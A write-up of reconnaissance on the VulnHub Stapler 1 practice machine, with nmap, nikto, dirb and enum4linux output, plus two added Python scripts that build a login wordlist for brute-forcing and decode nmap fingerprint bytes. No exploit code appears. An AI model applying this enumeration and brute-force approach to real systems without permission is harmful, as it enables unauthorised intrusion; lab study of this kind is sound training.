I want to try bug bounties

I keep saying "tempest" when I mean "pentest"

I hope today's effort pays off down the road. Do not misuse any of this.

vulnhub Stapler 1: notes

Stapler 1

Service enumeration

# nmap -p- 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:42 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00075s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.87 seconds
# nmap -Pn -p20,21,22,53,80,123,137,138,139,666,3306,12380 -sV --version-all 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:46 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00049s latency).

PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds

I can see what looks like a zip in that binary, but I don't know how to convert it.

Points of interest

  • [port 21] ftp vsftpd 2.0.8 or later
  • [port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  • [port 53] domain dnsmasq 2.75
  • [port 80] http PHP cli server 5.5 or later
  • [port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  • [port 666] open doom?
  • [port 3306] mysql MySQL 5.7.12-0ubuntu1
  • [port 12380] http Apache httpd 2.4.18 (Ubuntu)

First time I've had a service detected outside the well-known ports.
doom?

Details

[port 21] ftp vsftpd 2.0.8 or later

Unusually, the ftp version is ambiguous this time.

# ftp 10.10.10.14
Connected to 10.10.10.14.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (10.10.10.14:root): 
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> exit
221 Goodbye.

FTP login failed, but there's something that looks like a hint.

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

User enumeration didn't tell me anything either.

[port 53] domain dnsmasq 2.75

I have no idea how to approach a DNS server.

# searchsploit dnsmasq
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                       |  Path
                                                                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference                                                                                                                                            | exploits/windows/dos/9617.txt
Dnsmasq < 2.78 - 2-byte Heap Overflow                                                                                                                                                                | exploits/multiple/dos/42941.py
Dnsmasq < 2.78 - Heap Overflow                                                                                                                                                                       | exploits/multiple/dos/42942.py
Dnsmasq < 2.78 - Information Leak                                                                                                                                                                    | exploits/multiple/dos/42944.py
Dnsmasq < 2.78 - Integer Underflow                                                                                                                                                                   | exploits/multiple/dos/42946.py
Dnsmasq < 2.78 - Lack of free() Denial of Service                                                                                                                                                    | exploits/multiple/dos/42945.py
Dnsmasq < 2.78 - Stack Overflow                                                                                                                                                                      | exploits/multiple/dos/42943.py
Web Interface for DNSmasq / Mikrotik - SQL Injection                                                                                                                                                 | exploits/php/webapps/39817.php
dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)                                                                                                                                        | exploits/linux/dos/48301.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Probably nothing?

[port 80] http PHP cli server 5.5 or later

An http server run by PHP feels unusual.

# nikto -h 10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-05-11 23:29:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-05-11 23:29:31 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There's a .bashrc and so on, so is it running out of a user's home directory?

# dirb http://10.10.10.14

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 11 23:33:56 2020
URL_BASE: http://10.10.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.14/ ----
+ http://10.10.10.14/.bashrc (CODE:200|SIZE:3771)                                                                                                                                                                                            
+ http://10.10.10.14/.profile (CODE:200|SIZE:675)                                                                                                                                                                                            
                                                                                                                                                                                                                                             
-----------------
END_TIME: Mon May 11 23:34:07 2020
DOWNLOADED: 4612 - FOUND: 2

For now, .bashrc is what interests me.

$ cat bashrc 
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
    # We have color support; assume it's compliant with Ecma-48
    # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
    # a case would tend to support setf rather than setaf.)
    color_prompt=yes
    else
    color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

I've seen a chroot vulnerability before, so there might be something here.
While I'm at it, .profile:

$ cat profile 
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

Either way, this doesn't look useful until I get a shell. I can't find a usable vulnerability in the PHP CLI server either, so I'm probably stuck here.

[port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

# enum4linux 10.10.10.14
(snip) ====================================================================== 
|    Users on 10.10.10.14 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
(snip)
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
(snip)

Unfortunately I couldn't determine the Samba version, but I found plenty of users. That's it. Metasploit would probably open things up, but I don't want to lean on it too much.
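The RID cycling above produced a long user list, and the write-up leaves it there. The following is an added example written for this page, not code from the original post: it parses that enum4linux output into uid/username pairs and turns the names, plus the first names that turn up in banners elsewhere in this write-up (Harry in the FTP banner, Scott in the image message, Dave and Pam in the port 12380 headers and certificate), into a login wordlist. The embedded text is a constructed excerpt of the lines above; whether any of these names is actually a valid login is an assumption until a service confirms it.

```python
# Added example (not from the original post): turn the enum4linux RID
# cycling output above into a login wordlist. SAMPLE_ENUM4LINUX is a
# constructed excerpt of those lines; BANNER_NAMES are first names that
# leaked elsewhere on the box (FTP banner, JPEG, HTTP header, certificate).
# Whether any of them is a login is an assumption until a service confirms it.
import re

SAMPLE_ENUM4LINUX = """\
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-22-1-1000 Unix User\\peter (Local User)
S-1-22-1-1001 Unix User\\RNunemaker (Local User)
S-1-22-1-1016 Unix User\\LSolum2 (Local User)
S-1-22-1-1018 Unix User\\jamie (Local User)
S-1-22-1-1028 Unix User\\www (Local User)
S-1-22-1-1029 Unix User\\elly (Local User)
"""
BANNER_NAMES = ["Harry", "Scott", "Dave", "pam"]

# S-1-22-1-<rid> is Samba's "Unix Users" authority; the rid is the account's uid.
UNIX_USER_RE = re.compile(r"^S-1-22-1-(\d+)\s+Unix User\\(\S+)")
INITIAL_SURNAME_RE = re.compile(r"[A-Z]{2}[a-z]+\d*")   # RNunemaker, LSolum2


def parse_unix_users(text: str) -> dict:
    """Map uid -> username. The uid order shows who was created first (1000)
    and which accounts look like service users (www)."""
    users = {}
    for line in text.splitlines():
        m = UNIX_USER_RE.match(line.strip())
        if m:
            users[int(m.group(1))] = m.group(2)
    return dict(sorted(users.items()))


def login_candidates(names, extra=()) -> list:
    """Ordered, de-duplicated logins to try against ftp/ssh/wp-login: the
    literal name, its lowercase form and, for initial+surname style names,
    the bare surname. Linux logins are case sensitive, so keep both spellings."""
    seen, out = set(), []

    def add(n):
        if n and n not in seen:
            seen.add(n)
            out.append(n)

    for n in list(names) + list(extra):
        add(n)
        add(n.lower())
        if INITIAL_SURNAME_RE.fullmatch(n):
            add(n[1:].lower())
    return out


if __name__ == "__main__":
    users = parse_unix_users(SAMPLE_ENUM4LINUX)
    for uid, name in users.items():
        print(uid, name)
    print("\n".join(login_candidates(users.values(), BANNER_NAMES)))
```

The printed list can be saved and handed to hydra -L or wpscan --usernames against the ftp, ssh and WordPress logins found above; the uid column is also a hint about which account to aim for later (uid 1000 is usually the primary human user).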

[port 666] open doom?

doom?
Looking it up, is this really the protocol of the game DOOM? Seriously?
I searched for an exploit anyway but found nothing.
Come to think of it, that mystery binary that showed up when I checked with nmap seems to have come from port 666.
Opening port 666 in Firefox shows garbled characters, and curl told me it couldn't because the response is HTTP 0.9.
No choice, so I download it with Firefox. Saving it as data.zip for now:

# file data.zip 
data.zip: Zip archive data, at least v2.0 to extract

Zip indeed.

# unzip data.zip 
Archive:  data.zip
  inflating: message2.jpg            
# file message2.jpg 
message2.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 364x77, components 3
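Both the question at the nmap stage (what to do with the zip-like bytes in the fingerprint) and the curl refusal on port 666 can be answered without Firefox. The following is an added example written for this page, not code from the original post: it decodes nmap's escaped SF: text back into bytes, reads the ZIP local file header those bytes start with, and offers a raw socket read for the whole archive. The embedded sample is the first three SF: lines of the scan above, so it is truncated mid-escape, which the decoder tolerates; the host and port in fetch_raw are the box from the scan and are not contacted unless you uncomment that line.

```python
# Added example (not from the original post): decode the escaped bytes nmap
# printed for port 666, read the ZIP local header they start with, and pull
# the full archive over a raw socket. SAMPLE_FINGERPRINT is the first three
# SF: lines of the scan above, cut mid-escape like any wrapped fingerprint.
import re
import socket
import string
import struct

SAMPLE_FINGERPRINT = r"""SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0"""

_SIMPLE = {"0": 0, "n": 10, "r": 13, "t": 9}   # nmap's one-letter escapes


def unescape_nmap(payload: str) -> bytes:
    """nmap prints bytes as hex escapes, NUL as backslash-0, and puts a
    backslash before regex metacharacters (. + ( [ $ and the double quote)
    so fingerprints can become probe matches. A trailing escape cut off by
    line wrapping is dropped rather than misread."""
    out = bytearray()
    i = 0
    while i < len(payload):
        c = payload[i]
        if c != "\\":
            out.append(ord(c))
            i += 1
        elif i + 1 >= len(payload):
            break                                   # lone trailing backslash
        elif payload[i + 1] == "x":
            pair = payload[i + 2:i + 4]
            if len(pair) < 2 or not all(h in string.hexdigits for h in pair):
                break                               # truncated hex escape
            out.append(int(pair, 16))
            i += 4
        else:
            out.append(_SIMPLE.get(payload[i + 1], ord(payload[i + 1])))
            i += 2
    return bytes(out)


def fingerprint_payload(sf_text: str) -> bytes:
    """Join wrapped SF: lines and decode the body of the first probe response."""
    lines = [ln.strip() for ln in sf_text.splitlines()]
    joined = "".join(ln[3:] if ln.startswith("SF:") else ln for ln in lines)
    m = re.search(r'%r\((\w+),(\d+),"', joined)
    if not m:
        raise ValueError("no probe response in fingerprint")
    body = joined[m.end():]
    end = body.rfind('")')               # missing when the fingerprint is truncated
    return unescape_nmap(body if end == -1 else body[:end])


def zip_local_header(data: bytes) -> dict:
    """Parse the ZIP local file header at offset 0. zipfile needs the central
    directory at the end of the archive, which 1350 captured bytes lack; the
    local header alone gives the member name, sizes and timestamp."""
    if data[:4] != b"PK\x03\x04":
        raise ValueError("not a ZIP local file header")
    (_sig, _ver, flags, method, mtime, mdate, crc, csize, usize,
     name_len, _extra_len) = struct.unpack_from("<4sHHHHHIIIHH", data, 0)
    modified = "%04d-%02d-%02d %02d:%02d:%02d" % (        # DOS date/time fields
        (mdate >> 9) + 1980, (mdate >> 5) & 0xF, mdate & 0x1F,
        mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2)
    return {"name": data[30:30 + name_len].decode("ascii", "replace"),
            "method": method, "compressed": csize, "uncompressed": usize,
            "crc32": crc, "modified": modified, "encrypted": bool(flags & 1)}


def fetch_raw(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Read what a service writes on connect until it closes. Port 666 sends
    the archive with no HTTP framing (nmap's NULL probe got it unprompted),
    which is why an HTTP client refused it."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            try:
                chunk = s.recv(65536)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    print(zip_local_header(fingerprint_payload(SAMPLE_FINGERPRINT)))
    # Full archive, same thing the Firefox download above produced:
    # open("data.zip", "wb").write(fetch_raw("10.10.10.14", 666))
```

Running it on the sample reports the member name message2.jpg, deflate compression, 11434 bytes compressed, 12821 uncompressed (the 13 kB exiftool shows below) and a June 2016 timestamp, all straight from the nmap text, before a single byte is downloaded.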

Displaying the image shows

~$ echo Hello World.
Hello World.
~$
~$ echo Scott, please change this message
segmentation fault

A puzzling message. Hmm.

# exiftool message2.jpg 
ExifTool Version Number         : 11.94
File Name                       : message2.jpg
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2016:06:03 11:03:07-04:00
File Access Date/Time           : 2020:05:12 00:22:45-04:00
File Inode Change Date/Time     : 2020:05:12 00:22:21-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 72
Y Resolution                    : 72
Current IPTC Digest             : 020ab2da2a37c332c141ebf819e37e6d
Contact                         : If you are reading this, you should get a cookie!
Application Record Version      : 4
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 364
Image Height                    : 77
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 364x77
Megapixels                      : 0.028

Cookie? It might be a big hint, but I have no idea what cookie it means.

[port 3306] mysql MySQL 5.7.12-0ubuntu1

No MySQL clues so far, so I couldn't log in.

[port 12380] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.14 -p 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '10.10.10.14' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8019 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-05-12 00:52:42 (GMT-4) (298 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Such generosity that I wonder what all my earlier struggling was for.

# dirb http://10.10.10.14:12380

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May 12 00:54:06 2020
URL_BASE: http://10.10.10.14:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.14:12380/ ----
                                                                                                                     
-----------------
END_TIME: Tue May 12 00:55:14 2020
DOWNLOADED: 4612 - FOUND: 0

Maybe it's about time to move on from dirb.
Let's start by checking robots.txt.
Accessing port 12380 in Firefox.
It returned a page with a WordPress-like design.
But robots.txt wasn't shown; the homepage came back instead.
Why?
No choice, so I'll go look at /admin112233/, /blogblog/ and /phpmyadmin/.
Again the homepage came back.
It seems to have a mission to return nothing but the homepage whatever I request.
Why?!

---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
